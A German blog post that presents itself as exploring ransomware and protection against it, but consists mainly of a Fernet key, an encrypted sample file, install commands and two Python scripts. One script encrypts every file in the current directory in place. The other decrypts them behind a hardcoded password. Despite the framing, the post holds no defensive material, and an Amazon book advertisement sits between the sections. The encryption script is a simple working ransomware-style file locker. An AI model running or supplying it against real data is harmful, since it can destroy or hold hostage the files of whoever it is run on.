Ransomware kann in Unternehmen, Organisationen oder generell in IT-Umgebungen erheblichen Schaden anrichten. Daten werden verschlüsselt und nur gegen Lösegeldzahlungen werden entsprechende Schlüssel heraus gegeben. Der dabei entstehende Schaden ist enorm und kann ganze Unternehmensschließungen bewirken. Doch wie weit kann man sich schützen? In diesem Beitrag tüfteln wir ein bisschen an der Materie rum.

Hier der Inhalt der zu entschlüsseln gilt und der entsprechende Key.

## Mein Entschlüsselungskey ##

mzMLiYkeheYPYYLPbCZqMNZV45SHQpN5V3YFtzLV5rY=
## geheimes_logo.txt ##

gAAAAABikdnHT1yH67DMGQLB1ckPfEwvaraEuOkUPrr4hsrE9iSkeoQDL13k5OdBPDCcYnqdE-l9VZh51SvVBtUt2FjflQx7SRN2AnOCveY1Lg8ekXNnMkttacHkiG7_BZ7HfsYQ_pcPgluQq13QkQK9iLWqI6zvaMT6Wnq69LfUky8IoiOe1JwH8s3_FRbrmgIZSUHu0_5ipROKCUwku3X8WUTdJ0LcxmYxYlMnWSDvuFNfwIR9UBRP_67J6KKyRQXVnykMxSjbXJFl3k8_nI4TvWGb-mCsmAmlynI9IRCnvi-Bs6lmMBC4xL9pyVWGBWaJG55VfCuPixH7ygRrGRDugqcDdTpxQgeyt3k86Nkh4c12QSD5kDzclWJk0MS9W3EYuOp-Ood_ykqQuRRCKkWF2-cBEwhR61iMJdg5Y6w_MM26UFICC4ksm9IVm90iqLYk6OSl0tlzlQ5YF2HZn9L6KSwsHUOqxV2RG8eX2YiWSgJaetwTmxbp_OiTox-ENj3ZmS8o-_F23NCv4yMbQzLlPclWQ07HaDcTHo8cmwhUT85Z8auEjNun3qfSsRR15qASZb0lH341UhMENF6qzBuWBP8pRcp_mkOUcyrvuYhKVBxebbinJkYQUX3diBSXcrDIjSE00RlnrYOQwj0qdUdcTajiH3jETAZlnfHGw3jdZ82GpFruXWVZb54Q9Dsj6K1aq2IB_3mhHKapUKmj6s4zc_u6jJnzMgPCALDeorptLn4z11UF_H7m-1BW3zQcWCh0H_4mMCNSpa9X4PQCWb0FedL3b92GNw==

Installation für das Skript

Ihr braucht ein paar Tools auf dem System um das Skript ausführen zu können. Dazu gehören Python3 und die Verschlüsselungsbibliotheken.

apt install python3 python3-pip
pip3 install fernet cryptography
Mastering Linux Security and Hardening: Protect your Linux systems from intruders, malware attacks, and other cyber threats, 2nd Edition
Mastering Linux Security and Hardening: Protect your Linux systems from intruders, malware attacks, and other cyber threats, 2nd Edition
  • Tevault, Donald A. (Autor)
70,99 EUR Amazon Prime
Bei Amazon ansehen

Verschlüsselungsskript

#!/usr/bin/env python3
# Import libraries

import os
from cryptography.fernet import Fernet
print("... libraries imported")

# Collect list of files
def get_file_list():
        files = []
        for file in os.listdir():
                if file == "encrypt.py" or file == "decrypt.py" or file == "key_file.key":
                 continue
                if os.path.isfile(file):
                 files.append(file)

        print("Found files are:", files)
        return files

# Generate Key
def generate_key_file():
        key = Fernet.generate_key()
        print("Key is:", key)

        with open("key_file.key", "wb") as f:
                f.write(key)
        print("...key-file generated")
        return key

# Encrypt
def encryption_process(files, key):
        print("Encryption started...")

        for file in files:
                with open(file, "rb") as f:
                 content = f.read()
                encrypted_content = Fernet(key).encrypt(content)
                with open(file, "wb") as f:
                 f.write(encrypted_content)

        print("...encryption complete")

# Main function calls
files = get_file_list()
key = generate_key_file()
encryption_process(files, key)

Entschlüsselungsskript

#!/usr/bin/env python3
# Import libraries

import os
from cryptography.fernet import Fernet
print("... libraries imported")

# Collect list of files
def get_file_list():
        files = []
        for file in os.listdir():
                if file == "encrypt.py" or file == "decrypt.py" or file == "key_file.key":
                 continue
                if os.path.isfile(file):
                 files.append(file)

        print("Found files are:", files)
        return files

# Get Key
def get_key():
        with open("key_file.key", "rb") as f:
                key = f.read()
        print("...key found")
        return key

# Decrypt
def decryption_process(files, key):
    password = input("Enter the password to decrypt the file:")
    if password == "ransome":
        print("Decryption started...")
        for file in files:
            with open(file, "rb") as f:
                content = f.read()
            decrypted_content = Fernet(key).decrypt(content)
            with open(file, "wb") as f:
                f.write(decrypted_content)

        print("...decryption complete")

# Main function calls
files = get_file_list()
key = get_key()
decryption_process(files, key)

Ansichten: 4.492